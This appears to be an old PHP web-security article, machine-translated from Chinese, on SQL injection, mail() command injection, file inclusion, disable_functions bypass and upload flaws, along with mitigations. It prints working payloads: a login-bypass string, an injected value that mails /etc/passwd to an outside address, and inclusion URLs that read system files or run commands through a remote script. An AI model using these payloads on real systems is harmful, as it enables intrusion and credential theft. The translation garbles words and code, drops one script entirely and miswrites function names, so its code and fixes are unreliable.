The Shaun Clowes Article Exploiting Common Vulnerabilities in PHP Applications is indeed well written,
I have considered many aspects. This article only adds some other questions that have not been mentioned. This article focuses on solving the problem rather
Attack.
1. Ancient spoofing SQL statements
In the default mode, even if you forget to copy php. ini to/usr/local/lib/php. ini, php still opens magic_quotes_gpc = on.
In this way, the single quotation marks ('), double quotation marks ("), backslash (), and null characters NUL of all variables from GET/POST/Cookie
(The null byte) will be added with a backslash, so that the database can be correctly queried.
But when I introduced a configuration file php. ini-optimized in the php-4-RC2, the optimized php. ini is
Magic_quotes_gpc = off. Some network administrators may copy php. ini-optimized
/Usr/local/lib/php. ini is dangerous. For example, it is relatively simple to verify, assuming that the necessary characters are not filtered:
Select * from login where user = '$ HTTP_POST_VARS [user]' and pass = '$ HTTP_POST_VARS [pass]'
In the User box and Password box, we can enter 1 'or 1 = '1 to pass verification. This is an antique method. This statement will
Replace it with the following:
Select * from login where user = '1' or 1 = '1' and pass = '1' or 1 = '1'
Because or 1 = '1' was set up, it passed.
The best solution is to filter out all unnecessary characters, and we recommend that you use GET/POST/Cookie in SQL
Add a custom function to the variable in:
Function gpc2sql ($ str ){
If (get_magic_quotes_gpc () = 1)
Return $ str;
Else
Return addslashes ($ str );
}
It is mainly for your program to be securely transplanted to various systems.
2. The fifth parameter of the mail function
In the php-4.0.5, the mail function introduced the fifth parameter to set additional command line parameters when actually sending the mail,
However, the special SHELL command characters are not well checked, so a major problem occurs in command execution. Just like the example in the manual:
Mail ("nobody@aol.com", "the subject", $ message, "From: webmaster @ $ SERVER_NAME", "-fwebmaster @ $ SERVERNAME ");
This is problematic, if $ SERVER_NAME =; mail san@xfocus.org </etc/passwd can send the Machine Password
To my mailbox.
Here, I would like to remind you that there are several examples of security problems in the php manual. You should not copy them when using them. It only demonstrates the function.
Basic functions.
For the mail function, we do not need to use the fifth parameter to filter out invalid characters, such as (;), or modify them.
Php source code package program ext/standard/mail. c, in if (extra_cmd! = NULL) {Add the following line before:
Extra_cmd = NULL
Then re-compile.
3. UNIX edition require and include functions
The require and include functions of win versions do not support HTTP and FTP Remote File Inclusion, while UNIX versions support remote file inclusion by default.
Require and include, No matter what extension you use, include you as part of the Program for execution.
Many require or include functions are inevitably used for program modularization and program portability during program writing,
Sometimes, variables are used as parameters, such as include ("$ something"). If you can control the $ something parameter
If the parameter is not filtered, it will be miserable.
First, you can view the files that any web user has read permission. Assume that this program is called http: // victim/test. php, so that we can use the following
Url: http: // victim/test. php? Something =/etc/passwd to see the/etc/passwd file.
In addition, you can execute commands using the functions contained in remote files. For example, if I create a file test. php under www.xfocus.org, the content is:
Then I can use the following url:
Http: // victim/test. php? Something = http://www.xfocus.org/test.php? Cmd = uname
Command.
PhpMyAdmin also encountered this problem. We can use it to view any files we want to see. However, before the include operation, use file_exist
The function checks whether a file exists, and this file_exist does not support remote files. Therefore, the second method cannot be used directly. But we
You can use apache's log function to request a url with php code. In this way, logs specified as apache can be executed
However, apache logs are usually large and contain too much messy information.
Http://www.securereality.com.au/sradv1_8.txtis a good way to handle requests.
The script for executing commands will generate file names such as php8Ta02I in the temporary directory of the Server File Upload.
So you can use the file_exist function to execute the execution script in the uploaded file.
Therefore, you must be careful when using the include and require functions, especially when specifying the include file with parameters.
Allow users to control. You can also remove remote files by modifying the php. ini file to include this function. This was used before php-4.0.3
In later versions, disable-url-fopen-wrapper will be disabled using allow_url_fopen = off.
4. disable_function
In the php-4.0.1, php. ini introduced a feature called disable_functions, which is useful and can be used to disable some functions.
For example, if disable_functions = passthru exec system popen is added to php. ini, when these functions are executed
Only the prompt "Warning: system () has been disabled for security reasons" is displayed.
Alas, but there is no way to execute system commands. Because php uses many perl features, for example, you can use (') to execute the command:
$ Output = 'LS-al ';
Echo"
$output
";
?>
This can be avoided only when it is set to safe_mode. However, the hateful safe_mode has too many restrictions, and it is somewhat inconvenient to do other things.
5. file upload
PHP File Upload problems have been clarified in the article http://www.securereality.com.au/sradv#1.html,
This is indeed a serious problem. Generally, the files to be uploaded are stored in the web directory, so attackers can easily obtain some web users of the system.
Readable files.
Thanks to the is_uploaded_file and move_uploaded_file functions provided after the php-4.0.3. So the php-4.0.3 above upload text
The program must not use the copy function, instead of move_uploaded_file. It will check whether it is an uploaded file. For php-4.0.2
And the following, we recommend that you add a function before copy:
Function is_uploaded_file ($ filename ){
If (! $ Tmp_file = get_cmd_var ('upload _ tmp_dir ')){
$ Tmp_file = dirname (tempnam ('',''));
}
$ Tmp_file. = '/'. basename ($ filename );
/* User might have trailing slash in php. ini ...*/
Return (ereg_replace ('/+', '/', $ tmp_file) ==$ filename );
}
This vulnerability has been in the security focus for a long time, but there are a lot of statements to verify and judge before the copy, so it is quite difficult to make the attack.
Also, do not use environment variables, Cookie variables, session variables, and so on as conditions for determining the link life and death, because these variables are too easy to be forged.
Haha, there are a lot of things at hand, and the others are coming to think about it. You are also welcome to add and modify any other comrades.
References
1. PHP 4 ChangeLog (http://www.php.net/ChangeLog-4.php)
2. A Study In Scarlet-Exploiting Common Vulnerabilities in PHP Applications
(Http://www.securereality.com.au/studyinscarlet.txt) and analysist translation.
3. Remote command execution vulnerabilities in phpMyAdmin and phpPgAdmin
Http://www.securereality.com.au/sradv00008.txt)